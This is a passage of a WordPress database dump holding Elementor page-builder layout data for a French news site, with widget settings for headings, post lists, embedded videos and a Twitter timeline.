\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1484,504,'_elementor_version','0.4'),(1485,504,'_elementor_css','a:3:{s:4:\"time\";i:1508924751;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1486,505,'_elementor_edit_mode','builder'),(1487,505,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1488,505,'_elementor_version','0.4'),(1490,506,'_elementor_edit_mode','builder'),(1491,506,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile